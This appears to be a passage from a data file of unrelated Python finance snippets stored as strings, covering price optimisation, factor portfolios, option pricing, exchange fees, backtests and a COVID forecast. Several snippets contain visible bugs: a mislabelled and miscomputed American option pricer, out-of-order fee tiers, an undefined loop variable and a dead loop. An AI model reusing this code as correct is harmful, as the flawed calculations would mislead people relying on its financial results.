total_deal_stats['DealCOPQuotePriceExpectedGP'] = quote_df['COPQuotePriceExpectedGP'].sum().round(decimals=0)\r\n total_deal_stats['DealCOPQuotePriceWinProb'] = total_deal_stats['DealCOPQuotePriceExpectedGP'] / total_deal_stats['DealCOPQuotePriceGP']\r\n # this section contains COP Optimal Price Data (Line Item Sum)\r\n total_deal_stats[' COP Optimal Price Data (Line Item Sum)'] = ''\r\n total_deal_stats['DealCOPOptimalPrice'] = quote_df['COPOptimalPrice'].sum().round(decimals=0)\r\n total_deal_stats['DealCOPOptimalPriceWinProb'] = ''\r\n total_deal_stats['DealCOPOptimalPriceGP'] = quote_df['COPOptimalPriceGP'].sum().round(decimals=2)\r\n total_deal_stats['DealCOPOptimalPriceExpectedGP'] = quote_df['COPOptimalPriceExpectedGP'].sum().round(decimals=2)\r\n total_deal_stats['DealCOPOptimalPriceWinProb'] = total_deal_stats['DealCOPOptimalPriceExpectedGP'] / total_deal_stats['DealCOPOptimalPriceGP']\r\n total_deal_stats['DealCOPOptimalPriceIntervalLow'] = quote_df['COPOptimalPriceIntervalLow'].sum().round(decimals=0)\r\n total_deal_stats['DealCOPOptimalPriceIntervalHigh'] = quote_df['COPOptimalPriceIntervalHigh'].sum().round(decimals=0)\r\n # this section contains quoted price data within the Customized Optimal Price (COP) estimates\r\n total_deal_stats[' COP Quote Price Data (Bottom-Line)'] = ''\r\n total_deal_stats['DealCOPBotLineQuotePrice'] = total_deal_stats['DealQuotePrice']\r\n total_deal_stats['DealCOPBotLineQuotePriceWinProb'] = BPF.ProbOfWin(total_deal_stats['DealCOPQuotePrice'], total_deal_stats['DealCOPLowPrice'], total_deal_stats['DealCOPMedPrice'], total_deal_stats['DealCOPHighPrice'])\r\n total_deal_stats['DealCOPBotLineQuotePriceGP'] = total_deal_stats['DealCOPBotLineQuotePrice'] - total_deal_stats['DealTMC']\r\n total_deal_stats['DealCOPBotLineQuotePriceExpectedGP'] = total_deal_stats['DealCOPBotLineQuotePriceGP'] *total_deal_stats['DealCOPBotLineQuotePriceWinProb']\r\n # this section contains COP Optimal Price Data (Bottom-Line)\r\n total_deal_stats[' COP Optimal Price Data (Bottom-Line)'] 
= ''\r\n total_deal_stats['DealCOPBotLineOptimalPrice'] = BPF.OptPrice(total_deal_stats['DealCOPLowPrice'], total_deal_stats['DealCOPMedPrice'], total_deal_stats['DealCOPHighPrice'], total_deal_stats['DealTMC'], 0, 0, 0).round(decimals=0)\r\n total_deal_stats['DealCOPBotLineOptimalPriceWinProb'] = BPF.ProbOfWin(total_deal_stats['DealCOPBotLineOptimalPrice'], total_deal_stats['DealCOPLowPrice'], total_deal_stats['DealCOPMedPrice'], total_deal_stats['DealCOPHighPrice'])\r\n total_deal_stats['DealCOPBotLineOptimalPriceGP'] = total_deal_stats['DealCOPBotLineOptimalPrice'] - total_deal_stats['DealTMC']\r\n total_deal_stats['DealCOPBotLineOptimalPriceExpectedGP'] = total_deal_stats['DealCOPBotLineOptimalPriceGP'] * total_deal_stats['DealCOPBotLineOptimalPriceWinProb']\r\n total_deal_stats['DealCOPBotLineOptimalPriceIntervalLow'], total_deal_stats['DealCOPBotLineOptimalPriceIntervalHigh'] = BPF.OptPriceConfIntervl(total_deal_stats['DealCOPBotLineOptimalPrice'], total_deal_stats['DealCOPLowPrice'], total_deal_stats['DealCOPMedPrice'], total_deal_stats['DealCOPHighPrice'], total_deal_stats['DealTMC'])\r\n \r\n print ' total_deal_stats creation complete'\r\n \r\n #This stores copies of the returned data\r\n quote_df.to_csv(data_path + 'quote_return.csv')\r\n total_deal_stats.to_csv(data_path + 'total_deal_stats_return.csv') \r\n \r\n end_time = time.time() #stop a timer\r\n print 'Elapsed time (milliseconds): ', int(1000 * (end_time - start_time))\r\n \r\n return quote_df, total_deal_stats", "def before_trading_start(context, data):\n factors = pipeline_output('ff_example')\n\n # get the data we're going to use\n returns = factors['returns']\n mkt_cap = factors.sort_values(['market_cap'], ascending=True)\n be_me = factors.sort_values(['be_me'], ascending=True)\n\n # to compose the six portfolios, split our universe into portions\n half = int(len(mkt_cap)*0.5)\n small_caps = mkt_cap[:half]\n big_caps = mkt_cap[half:]\n \n thirty = int(len(be_me)*0.3)\n seventy = int(len(be_me)*0.7)\n growth = be_me[:thirty]\n neutral = be_me[thirty:seventy]\n value = be_me[seventy:]\n\n # now use the portions to construct the portfolios.\n # note: these portfolios are just lists (indices) of equities\n small_value = small_caps.index.intersection(value.index)\n small_neutral = small_caps.index.intersection(neutral.index)\n small_growth = small_caps.index.intersection(growth.index)\n \n big_value = big_caps.index.intersection(value.index)\n big_neutral = big_caps.index.intersection(neutral.index)\n big_growth = big_caps.index.intersection(growth.index)\n\n # take the mean to get the portfolio return, assuming uniform\n # allocation to its constituent equities.\n sv = returns[small_value].mean()\n sn = returns[small_neutral].mean()\n sg = returns[small_growth].mean()\n \n bv = returns[big_value].mean()\n bn = returns[big_neutral].mean()\n bg = returns[big_growth].mean()\n\n # computing SMB\n context.smb = (sv + sn + sg)/3 - (bv + bn + bg)/3\n\n # computing HML\n context.hml = (sv + bv)/2 - (sg + bg)/2", "def update_price_model(self, good, order_type, is_successful, clearing_price=0):\n\n SIGNIFICANT = 0.25 # 25% more or less is \"significant\"\n SIG_IMBALANCE = 0.33\n LOW_INVENTORY = 0.1 # 10% of ideal inventory = \"LOW\"\n HIGH_INVENTORY = 2.0 # 200% of ideal inventory = \"HIGH\"\n MIN_PRICE = 0.01 # lowest allowed price of a Good\n\n if is_successful:\n # add this trade to the observed trading range\n self.observed_trading_range[good].append(clearing_price)\n\n public_mean_price = self.market.mean_price(good)\n belief 
= self.price_belief[good]\n mean = belief.mean()\n wobble = 0.05 # the degree which the Pop should bid outside the belief\n\n # how different the public mean price is from the price belief\n delta_to_mean = mean - public_mean_price\n\n if is_successful:\n if order_type is OrderType.buy_order and delta_to_mean > SIGNIFICANT:\n # this Pop overpaid, shift belief towards mean\n belief.low -= delta_to_mean / 2\n belief.high -= delta_to_mean / 2\n elif order_type is OrderType.sell_order and delta_to_mean < -SIGNIFICANT:\n # this Pop underpaid!, shift belief towards mean\n belief.low -= delta_to_mean / 2\n belief.high -= delta_to_mean / 2\n\n # increase the belief's certainty\n belief.low += wobble * mean\n belief.high -= wobble * mean\n\n else:\n # shift towards mean\n belief.low -= delta_to_mean / 2\n belief.high -= delta_to_mean / 2\n\n # check for inventory special cases\n stocks = self.inventory.get_amount(good)\n ideal = self.inventory.get_ideal(good)\n\n # if we're buying and inventory is too low\n # meaning we're desperate to buy\n if order_type is OrderType.buy_order and stocks < LOW_INVENTORY * ideal:\n wobble *= 2\n\n # if we're selling and inventory is too high\n # meaning we're desperate to sell\n elif order_type is OrderType.sell_order and stocks > HIGH_INVENTORY * ideal:\n wobble *= 2\n # all other cases\n else:\n sells = self.market.history.sell_orders.average(good, 1)\n buys = self.market.history.buy_orders.average(good, 1)\n\n # TODO: figure out why this is sometimes 0\n if sells + buys > 0:\n\n supply_vs_demand = (sells - buys) / (sells + buys)\n\n if supply_vs_demand > SIG_IMBALANCE or supply_vs_demand < -SIG_IMBALANCE:\n # too much supply? lower bid lower to sell faster\n # too much demand? raise price to buy faster\n\n new_mean = public_mean_price * (1 - supply_vs_demand)\n delta_to_mean = mean - new_mean\n\n # shift the price belief to the new price mean\n belief.low -= delta_to_mean / 2\n belief.high -= delta_to_mean / 2\n\n\n # decrease belief's certainty since we've just changed it (we could be wrong)\n belief.low -= wobble * mean\n belief.high += wobble * mean\n\n # make sure the price belief doesn't decrease below the minimum\n if belief.low < MIN_PRICE:\n belief.low = MIN_PRICE\n elif belief.high < MIN_PRICE:\n belief.high = MIN_PRICE", "def add_average_discount_to_target(data):\n\n data['adj_price'] = data.price.map(lambda x: (x - x * 0.05))\n data['adj_price_sqrm'] = data.price_sqrm.map(lambda x: (x - x * 0.05))\n\n return data", "def AmericanBinomialPricer(pricing_engine, option, data):\r\n\r\n\r\n expiry = option.expiry\r\n strike = option.strike\r\n (spot, rate, volatility, dividend) = data.get_data()\r\n steps = pricing_engine.steps\r\n nodes = steps + 1\r\n dt = expiry / steps \r\n u = np.exp((rate * dt) + volatility * np.sqrt(dt)) \r\n d = np.exp((rate * dt) - volatility * np.sqrt(dt))\r\n pu = (np.exp(rate * dt) - d) / (u - d)\r\n pd = 1 - pu\r\n disc = np.exp(-rate * expiry)\r\n spotT = 0.0\r\n payoffT = 0.0\r\n callT = 0.0\r\n putT= 0.0\r\n #call\r\n for i in range(nodes):\r\n spotT = spot * (u ** (steps - i)) * (d ** (i))\r\n payoffT += option.payoff(spotT) * binom.pmf(steps - i, steps, pu) \r\n spotT = spotT/d\r\n callT = max(callT, spotT-strike)\r\n price = disc * payoffT\r\n #put\r\n for i in range(nodes):\r\n spotT = spot * (u ** (steps - i)) * (d ** (i))\r\n payoffT += option.payoff(spotT) * binom.pmf(steps - i, steps, pu) \r\n spotT = spotT/d\r\n putT = max(putT, strike-spot)\r\n price = disc * payoffT\r\n \r\n return price", "def field_buy(self, 
symbol):\r\n\r\n end_percent = 150\r\n current_price = 15#self.get_price()\r\n self.log(current_price)\r\n buys = {}\r\n new_price = current_price * 1.05\r\n while (new_price / current_price) > 150:\r\n self.log(\"New sell at: {}\".format(new_price))\r\n new_price *= 1.05\r\n\r\n self.log(buys)\r\n\r\n return buys", "def get_perf(self) :\n self.train()\n\n prediction = self.clf.predict(self.df_test.drop(columns = 'up')[:-1])\n self.accuracy = accuracy_score(df_test['up'][length:].values, prediction)\n tn, fp, fn, tp = confusion_matrix(df_test['up'][length:].values, prediction).ravel()\n self.recall = tp/(tp+fn)\n self.specificity = tn / (tn+fp)\n\n\n self.df_true = self.df_true[self.length:]\n\n profit = 1\n mini = 1\n maxi = 1\n self.df_true['close'] = self.df_true['close'].map(lambda x : np.exp(x))\n for s in range(1,len(self.df_true)):\n if prediction[x-1] == 1 :\n result = ((self.df_true['close'].iloc[s] -self.df_true['close'].iloc[s-1]) / self.df_true['close'].iloc[s-1]) + 1\n profit = profit * result\n if result < mini :\n mini = result\n if maxi < result :\n maxi = result\n self.mini = mini\n self.maxi = maxi\n self.profit = profit", "def conversion_rate(self, price):\n\n price = ( price - 20 ) / 2\n\n a = self.a_conversion_rate\n b = self.b_conversion_rate\n c = self.c_conversion_rate\n d = self.d_conversion_rate\n e = self.e_conversion_rate\n # price_min = self.price_min\n # Probabilities of conversion given a price\n return c * np.exp ( a * ( price - e) ** (1/ (2 * b) ) ) * (d - 2*price) ** (3/2)", "def calc_base_year_data(base_year_vehicles_df):\n pass", "def get_fee_pct(self, contract_type: str) -> Tuple[float, float]:\n if contract_type == 'forex':\n return (0.00002, 0.00002)\n elif contract_type == 'crypto':\n if self.CRYPTO_EXCHANGE == 'binance':\n if self.trade_volume < 50_000:\n return (.001, .001)\n elif self.trade_volume < 100_000:\n return (.0009, .0009)\n elif self.trade_volume < 5000_000:\n return (.0009, .0008)\n elif self.trade_volume < 1_000_000:\n return (.0008, .0007)\n elif self.trade_volume < 5_000_000:\n return (.0007, .0005)\n elif self.trade_volume < 10_000_000:\n return (.0006, .0004)\n elif self.trade_volume < 25_000_000:\n return (.0006, 0)\n elif self.trade_volume < 100_000_000:\n return (.0005, 0)\n elif self.trade_volume < 250_000_000:\n return (.0004, 0)\n elif self.trade_volume < 500_000_000:\n return (.0003, 0)\n else: return (.0002, 0)\n elif self.CRYPTO_EXCHANGE == 'kraken':\n if self.trade_volume < 50_000:\n return (.0026, .0016)\n elif self.trade_volume < 100_000:\n return (.0024, .0014)\n elif self.trade_volume < 250_000:\n return (.0022, .0012)\n elif self.trade_volume < 500_000:\n return (.002, .001)\n elif self.trade_volume < 1_000_000:\n return (.0018, .0008)\n elif self.trade_volume < 2_500_000:\n return (.0016, .0006)\n elif self.trade_volume < 5_000_000:\n return (.0014, .0004)\n elif self.trade_volume < 10_000_000:\n return (.0012, .0002)\n else: return (.001, 0)\n elif self.CRYPTO_EXCHANGE == 'coinbase':\n if self.trade_volume < 10_000:\n return (.005, .005)\n elif self.trade_volume < 50_000:\n return (.0035, .0035)\n elif self.trade_volume < 100_000:\n return (.0025, .0015)\n elif self.trade_volume < 1_000_000:\n return (.002, .001)\n elif self.trade_volume < 10_000_000:\n return (.0018, .0008)\n elif self.trade_volume < 50_000_000:\n return (.0015, .0005)\n elif self.trade_volume < 300_000_000:\n return (.0007, 0)\n elif self.trade_volume < 500_000_000:\n return (.0005, 0)\n else: return (.0004, 0)\n elif self.CRYPTO_EXCHANGE == 
'robinhood':\n return (0.0001, 0.0001)\n return (0, 0)", "def calc_earning(self, data=None):\n result = Result()\n if data is None:\n data = self.security\n self.calcDecision()\n first_purchase_method = self.check_first_purchase_method()\n for i in np.arange(len(data['Close'])):\n if data['FinalDecision'].iloc[i] is None:\n pass\n elif data['FinalDecision'].iloc[i] == TransactionType.BUY:\n if data['FinalDecision'].iloc[i-1] == TransactionType.BUY:\n pass\n else:\n if (self.buys_made + self.sells_made) == 0:\n if first_purchase_method == FirstTransactionType.INIT_CAPITAL:\n self.shares_own = int((self.init_capital/data['Close'].iloc[i]))\n self.buys_made += 1\n elif first_purchase_method == FirstTransactionType.STOCK_QUANTITY:\n self.shares_own = self.stock_quantity\n self.buys_made += 1\n else:\n self.shares_own = int(self.final_capital / data['Close'].iloc[i])\n self.final_capital = self.final_capital % data['Close'].iloc[i]\n #print(self.shares_own)\n\n elif data['FinalDecision'].iloc[i] == TransactionType.SELL:\n if data['FinalDecision'].iloc[i-1] == TransactionType.SELL:\n pass\n else:\n if (self.buys_made + self.sells_made) == 0:\n pass\n else:\n self.final_capital += self.shares_own * data['Close'].iloc[i]\n self.shares_own = 0\n self.sells_made +=1\n #Checar si es el momento mas alto o bajo de ganancias\n if self.shares_own == 0:\n if (self.highest_point is None\n or self.highest_point < self.final_capital):\n self.highest_point = self.final_capital\n if (self.lowest_point is None\n or self.lowest_point > self.final_capital\n or self.lowest_point == 0):\n self.lowest_point = self.final_capital\n else:\n if (self.highest_point is None\n or self.highest_point < (self.shares_own * data['Close'].iloc[i])):\n self.highest_point = self.final_capital\n if (self.lowest_point is None\n or self.lowest_point > (self.shares_own * data['Close'].iloc[i])\n or self.lowest_point == 0):\n self.lowest_point = self.final_capital\n self.calcRealFinalCapital()\n self.calcDiferencePercentage()", "def get_output(data, capital=100000, leverage=1, commission=0, slippage=0):\n total_capital = capital * leverage\n df = data\n df['cnt'] = df.groupby('timestamp')['symbol'].transform(\n lambda x: len(x))\n df['qty'] = (total_capital/df['cnt']/df['price']).round()\n df['profit'] = df.eval('(sell-buy)*qty')\n df['commission'] = df.eval('(sell+buy)*qty') * commission * 0.01\n df['slippage'] = df.eval('(sell+buy)*qty') * slippage * 0.01\n df['net_profit'] = df.eval('profit - commission - slippage')\n return df", "def my_rebalance(context, data):\n freq_month = 3\n context.counter += 1\n if context.counter == freq_month:\n for stock, weight in context.weights.iteritems():\n context.counter = 0\n if data.can_trade(stock):\n order_target_percent(stock, weight)", "def calculate_forward_returns(data: pd.DataFrame, periods: list, price_key='close') -> pd.DataFrame:\n returns = pd.DataFrame(index=data.index)\n for period in periods:\n if type(data.index) == pd.MultiIndex:\n def multi_index_forward_returns(df: pd.DataFrame):\n return df[price_key].pct_change(periods=period).shift(-period)\n\n tmp = data.groupby(level=1).apply(multi_index_forward_returns).droplevel(0)\n returns[str(period) + '_period_return'] = tmp\n else:\n returns[str(period) + '_period_return'] = data[price_key].pct_change(periods=period).shift(-period)\n return returns", "def get_adjusted_data(stockSymbol, df):\n\n events = ['SPLIT', 'BONUS']\n arr = ['Open Price', 'High Price', 'Low Price',\n 'Last Price', 'Close Price', 'Average Price']\n\n 
stockSymbol = stockSymbol.replace('&', '%26')\n\n if(df.empty):\n print(\"Please check data. Dataframe is empty\")\n return df\n\n df.index = pd.to_datetime(df.index)\n df.sort_index(inplace=True)\n\n try:\n df = df.drop(['Prev Close'], axis=1)\n except KeyError:\n pass\n\n for event in events:\n\n ratio, dates = scrape_bonus_splits(stockSymbol, event)\n for i in range(len(dates)):\n\n date = datetime.datetime.strptime(dates[i], '%d-%b-%Y')\n print(event, \" on : \", dates[i], \" and ratio is : \", ratio[i])\n\n changed_data = df.loc[df.index < date]\n same_data = df.loc[df.index >= date]\n\n for j in arr:\n\n try:\n changed_data.loc[:, j] = changed_data.loc[:, j]/ratio[i]\n except TypeError:\n pass\n\n df = pd.concat([changed_data, same_data])\n\n return df", "def process_data(data):\n locale.setlocale(locale.LC_ALL, 'en_US.UTF8')\n max_revenue = {\"revenue\": 0}\n max_total_sales = {\"total_sales\": 0}\n all_years = {}\n for item in data:\n # Calculate the revenue generated by this model (price * total_sales)\n # We need to convert the price from \"$1234.56\" to 1234.56\n item_price = locale.atof(item[\"price\"].strip(\"$\"))\n item_revenue = item[\"total_sales\"] * item_price\n if item_revenue > max_revenue[\"revenue\"]:\n item[\"revenue\"] = item_revenue\n max_revenue = item\n # TODO: also handle max sales\n if item['total_sales'] > max_total_sales[\"total_sales\"]:\n max_total_sales = item\n # TODO: also handle most popular car_year\n if item['car']['car_year'] not in all_years:\n all_years[item['car']['car_year']] = 1\n else:\n all_years[item['car']['car_year']] += 1\n\n sorted_all_years = sorted(all_years.items(), key=operator.itemgetter(1))\n that_year = sorted_all_years[-1][0]\n print(that_year)\n year_sales = 0\n for item in data:\n if item['car']['car_year'] == that_year:\n year_sales = year_sales + item['total_sales']\n \n summary = [\n \"The {} generated the most revenue: ${}\".format(format_car(max_revenue[\"car\"]), max_revenue[\"revenue\"]), \"The {} had the most sales: {}\".format(format_car(max_total_sales[\"car\"]), max_total_sales[\"total_sales\"]), \"The most popular year was {} with {} sales.\".format(that_year, year_sales)\n ]\n\n return summary", "def trading_alg(self,table_name = None, buy_now = False, strategy_name = \"sma9\"):\n \n self.bs.buyed_stocks = 0\n self.bs.money = self.bs.startCredit\n spy_stocks = self.load_data(table_name = table_name, symbols = [\"SPY\"])\n spy_stocks = FinI.add_indicators(spy_stocks)\n \n if self.symbols:\n symbols = self.symbols\n else:\n symbols = self.db.get_symbols()\n\n # symbols = [\"INTC\",\"BYND\",\"ZM\",\"NKE\",\"HIMX\",\"JKS\",\"ENPH\",\"DUK\",\"GE\",\"DIS\",\"LEVI\",\"NVAX\",\"SLCA\",\"GPS\"]\n \n for symbol in symbols:\n print(\"symbol: \" + str(symbol))\n \n sub_data = self.load_data(table_name = table_name, symbols = symbol)\n if len(sub_data) < 1:\n break\n\n self.bt_stocks = FinI.add_indicators(sub_data)\n self.bt_stocks = FinI.add_fib(self.bt_stocks)\n # print(self.bt_stocks)\n print(self.bt_stocks[\"sma30\"])\n print(\"calculating percent change:\" + str(symbol))\n # sub_data = self.stocks.loc[self.stocks.sym ==symbol[0]].sort_values(by='index')\n \n self.symbols = symbol[0]\n \n # self.prev_stock = sub_data.iloc[0]\n # self.bt_stocks.iloc[0] = sub_data.iloc[0]\n\n # self.sell_marks = self.sell_marks.iloc[0:0]\n # self.buy_marks = self.buy_marks.iloc[0:0]\n self.bs.transactions = 0\n self.bs.profit_perc = 0\n \n # trend_indicator = \n # TODO mechanism for select strategies\n # self.ts_boll(buy_now = buy_now, 
at_settings = None, symbol = symbol, spy_stocks = spy_stocks)\n self.ts_eval(buy_now = buy_now, at_settings = None, symbol = symbol, spy_stocks = spy_stocks, strategy_logic = strategy_name)\n\n # call the method with passed and assembled name\n # method = getattr(self, 'ts_' + strategy_name)\n # method(buy_now = buy_now, at_settings = None, symbol = symbol, spy_stocks = spy_stocks, strategy_name = strategy_name)", "def sp_recovery_rate(model_df):\n new_rr_map = {'1+(100)': 0.75,\n '1(95%)': 0.70,\n '1(90%)': 0.65,\n '2(85%)': 0.625,\n '2(80%)': 0.60,\n '2(75%)': 0.55,\n '2(70%)': 0.5,\n '3(65%)': 0.45,\n '3(60%)': 0.4,\n '3(55%)': 0.35,\n '3(50%)': 0.3,\n '4(45%)': 0.285,\n '4(40%)': 0.27,\n '4(35%)': 0.235,\n '4(30%)': 0.20,\n '5(25%)': 0.175,\n '5(20%)': 0.15,\n '5(15%)': 0.10,\n '5(10%)': 0.05,\n '6(5%)': 0.035,\n '6(0%)': 0.02,\n '3H': 0.40,\n '1': 0.65}\n \n LienOne_map = {'AU':0.50,'AT':0.50,'BE':0.50,\n 'CA':0.50,'DK':0.50,'FI':0.50,'FR':0.50,\n 'DE':0.50,'HK':0.50,'IE':0.50,'IS':0.50,\n 'JP':0.50,'LU':0.50,'NL':0.50,'NO':0.50,\n 'PO':0.50,'PT':0.50,'SG':0.50,'ES':0.50,\n 'SE':0.50,'CH':0.50,'GB':0.50,'US':0.50,\n 'BR':0.39,'CZ':0.39,'GR':0.39,'IT':0.39,\n 'MX':0.39,'ZA':0.39,'TR':0.39,'UA':0.39}\n LienTwo_map = {'AU':0.18,'AT':0.18,'BE':0.18,\n 'CA':0.18,'DK':0.18,'FI':0.18,'FR':0.18,\n 'DE':0.18,'HK':0.18,'IE':0.18,'IS':0.18,\n 'JP':0.18,'LU':0.18,'NL':0.18,'NO':0.18,\n 'PO':0.18,'PT':0.18,'SG':0.18,'ES':0.18,\n 'SE':0.18,'CH':0.18,'GB':0.18,'US':0.18,\n 'BR':0.13,'CZ':0.13,'GR':0.13,'IT':0.13,\n 'MX':0.13,'ZA':0.13,'TR':0.13,'UA':0.13}\n \n bond_map = {'US':0.41}\n \n \n # if it the Recovery rate exists lookup in AAA table\n model_df['S&P Recovery Rate (AAA)'] = model_df['S&P Recovery'].map(new_rr_map)\n #map(dict(new_rr[['S&P Recovery Rating\\nand Recovery\\nIndicator of\\nCollateral Obligations','“AAA”']].values))\n \n # doesn't exist, but first lien, use first lien table\n model_df.loc[pd.isna(model_df['S&P Recovery']) & (model_df['Lien Type']== 'First Lien'),'S&P Recovery Rate (AAA)'] =\\\n model_df.loc[pd.isna(model_df['S&P Recovery']) & (model_df['Lien Type']== 'First Lien'),'Issuer Country'].\\\n map(LienOne_map)\n #map(dict(lien[['Country Abv','RR']].values))\n \n \n # doesn't exist, but 2nd lien, use 2nd lien table\n model_df.loc[pd.isna(model_df['S&P Recovery']) & (model_df['Lien Type']== 'Second Lien'),'S&P Recovery Rate (AAA)'] = \\\n model_df.loc[pd.isna(model_df['S&P Recovery']) & (model_df['Lien Type']== 'Second Lien'),'Issuer Country'].\\\n map(LienTwo_map)\n #map(dict(lien[['Country Abv','RR.2nd']].values))\n \n # the bonds\n model_df.loc[pd.isna(model_df['S&P Recovery']) & pd.isna(model_df['Lien Type']),'S&P Recovery Rate (AAA)'] = \\\n model_df.loc[pd.isna(model_df['S&P Recovery']) & pd.isna(model_df['Lien Type']),'Issuer Country'].\\\n map(bond_map)\n #map(dict(bond_table[['Country Abv.1','RR.1']].values))\n\n return model_df", "def build_prophet_preds(data_url: str,\n changepoint_scale: float,\n holidays_scale: float,\n seasonality_scale: float,\n growth ='logistic') -> DataFrame:\n\n # read in the data\n df = pd.read_csv(data_url, parse_dates=['date'])\n\n ### PART 1: USE PROPHET TO FIT TOP-LEVEL FORECAST ON ALL CASES\n\n # get total number of cases for each day\n cases = df.groupby('date')['positiveIncrease'].sum().reset_index()\n cases.rename({'date': 'ds', 'positiveIncrease': 'y'}, axis=1, inplace=True)\n\n # variables we'll use a few times\n cap = 1000000\n floor = 0\n\n # add cap + floor for logistic growth model\n cases['cap'] = cap\n cases['floor'] = 
floor\n\n # initialize -- parameters were set via cross validation -- see notebook for covid modeling for more detail\n mod = Prophet(growth='logistic',\n changepoint_prior_scale = changepoint_scale,\n holidays_prior_scale = holidays_scale,\n seasonality_prior_scale = seasonality_scale)\n\n mod.add_country_holidays(country_name='US')\n\n print(f\"Fitting Model with parameters: changepoint_scale = {mod.changepoint_prior_scale}, holidays_scale: {mod.holidays_prior_scale}, seasonality_scale: {mod.seasonality_prior_scale}\")\n mod.fit(cases)\n\n # make df for future predictions -- seven days from most recent date in data set\n dates = pd.date_range(df['date'].max() + pd.DateOffset(days=1), periods=7).tolist()\n df_vals = [(date, cap, floor) for date in dates]\n future = pd.DataFrame(df_vals, columns=['ds', 'cap', 'floor'])\n\n # get top level predictions for each day in our forecast\n top_level_preds = mod.predict(future)[['ds', 'yhat', 'yhat_upper', 'yhat_lower']]\n\n ### PART 2: PROJECT TOP LEVEL PREDICTIONS DOWN TO ALL 50 STATES!\n\n # create new df with date/state pairs for each state and date for forecast dates\n states = df['state'].unique().tolist()\n test_df_vals = [(date, state) for date in dates for state in states]\n test_df = pd.DataFrame(test_df_vals, columns=['date', 'state']).sort_values(by='date')\n\n # get 7 day moving average of proportions for each state in our dataset, as of last day of recorded data\n train_grp = df.groupby('date')['positiveIncrease'].sum()\n train_cases = df.merge(train_grp, on='date', how='left')\n train_cases.rename({'positiveIncrease_y': 'totalCases'}, axis=1, inplace=True)\n train_cases['proportion'] = train_cases['positiveIncrease_x'] / train_cases['totalCases']\n train_cases.set_index(['state', 'date'], inplace=True)\n train_cases.sort_index(level=[0, 1], inplace=True)\n prop_moving_avgs = train_cases.groupby(level=0)['proportion'].rolling(7).mean()\n final_props = prop_moving_avgs.groupby(level=0).last()\n\n # merge proportions w/ preds_df on each unique date, proportion values\n test_df = test_df.merge(final_props, left_on='state', right_index=True, how='left')\n test_df = test_df.merge(top_level_preds, left_on='date', right_on='ds', how='left')\n test_df.dropna(inplace=True)\n\n # this loop takes each of our top level forecasted values, and multiplies them by the proportion\n # for each state on each day\n for col in ['yhat', 'yhat_upper', 'yhat_lower']:\n test_df[col] = test_df['proportion'] * test_df[col]\n\n # don't need these columns\n test_df.drop(['ds', 'proportion'], axis=1, inplace=True)\n\n # re-organize df to get a column for upper, lower, middle prediction for each state on each day\n test_df = test_df.pivot(index='state', columns='date', values=['yhat', 'yhat_upper', 'yhat_lower'])\n\n # following lines are to format test_df to something more readable in the database\n\n # get unique dates in test_df, in ascending order\n times = sorted(list(set(time for label, time in test_df.columns if 'yhat' in label)))\n # rename test_df columns to make them more semantic\n columns = [f'day{i}_{ending}' for ending in ['pred', 'pred_upper', 'pred_lower'] for i in range(1, len(times) + 1)]\n test_df.columns = columns\n\n # note what date day 1, 2, 3, etc actually are\n for idx, time in enumerate(times, start=1):\n test_df[f\"day{idx}_date\"] = time\n\n # popout out the state index one more time\n test_df.reset_index(inplace=True)\n\n # these last lines add a final line to test_df for total values for the entire usa\n num_vals = 
test_df.select_dtypes(include=np.number).sum()\n time_vals = test_df.select_dtypes(include=np.datetime64).iloc[0]\n index_vals = num_vals.index.tolist() + time_vals.index.tolist()\n index_vals.insert(0, 'state')\n\n series_vals = num_vals.tolist() + time_vals.tolist()\n series_vals.insert(0, 'USA')\n\n test_df = test_df.append(pd.Series(series_vals, index=index_vals), ignore_index=True)\n test_df['model'] = 'Prophet'\n test_df['dt'] = np.datetime64('now')\n\n return test_df", "def compute_quotation_price(self):\n result = decimal.Decimal('0')\n if self.vehiculePrice:\n result = self.vehiculePrice * 2 / 100\n if self.covWind:\n result += get_coverage_price_by_name(\"WIND\")\n if self.covPass:\n result += get_coverage_price_by_name(\"PASS\")\n if self.covFlood:\n result += get_coverage_price_by_name(\"FLOOD\")\n return result", "def income_model_constant_portfolio_return(num_of_years=30, trials=100, method='normal'):\n\n sim_fia_cv = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_base_total = pd.DataFrame(index=range(num_of_years + 1))\n sim_base_income = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_port_total = pd.DataFrame(index=range(num_of_years + 1))\n sim_port_income = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_base_total_pre_income = pd.DataFrame(index=range(num_of_years + 1))\n sim_port_total_pre_income = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_base_total_preincome = pd.DataFrame(index=range(num_of_years + 1))\n sim_port_total_preincome = pd.DataFrame(index=range(num_of_years + 1))\n\n # read_income_inputs = pd.read_csv(src + \"income_model_inputs.csv\", index_col='Items')\n read_income_inputs = pd.read_excel(src + \"portfolio_information.xlsx\", sheet_name='income_model_inputs',\n index_col=[0])\n\n # read_returns_est = pd.read_csv(src + \"income_assets_returns_estimates.csv\", index_col='Symbol')\n read_returns_est = pd.read_excel(src + \"portfolio_information.xlsx\", sheet_name='income_assets_returns_estimates',\n index_col=[0])\n\n # read_returns_est.drop(['BM', read_returns_est.index[-1]], axis=0, inplace=True)\n # read_portfolio_inputs = pd.read_csv(src + \"income_portfolio_inputs.csv\", index_col='Items')\n\n # read_asset_weights = pd.read_csv(src + \"asset_weights.csv\", index_col='Asset')\n read_asset_weights = pd.read_excel(src + \"portfolio_information.xlsx\", sheet_name='asset_weights',\n index_col=[0])\n\n read_asset_weights.drop(read_asset_weights.index[-1], axis=0, inplace=True)\n\n # read random returns for simulation\n read_normal = pd.read_csv(src + 'sort_normal.csv', index_col=[0], parse_dates=True)\n read_small = pd.read_csv(src + 'sort_small_to_large.csv', index_col=[0], parse_dates=True)\n read_large = pd.read_csv(src + 'sort_large_to_small.csv', index_col=[0], parse_dates=True)\n assets_col_names = list(read_normal.columns)\n\n tickers = list(read_asset_weights.index)\n wts = np.array(read_asset_weights.loc[:, 'base'])\n\n def asset_median_returns(data, ticker):\n return data.filter(regex=ticker).median(axis=1)\n\n # # dataframe for unsorted returns (normal)\n # median_returns_normal = pd.DataFrame({t: asset_median_returns(read_normal, t) for t in tickers})\n # median_returns_normal.loc[:, 'portfolio_return'] = median_returns_normal.dot(wts)\n # median_normal_fia = pd.DataFrame({'FIA': asset_median_returns(read_normal, 'r_FIA')})\n #\n # # dataframe for smallest to largest returns\n # median_returns_smallest = pd.DataFrame({t: asset_median_returns(read_small, t) for t in tickers})\n # median_returns_smallest.loc[:, 
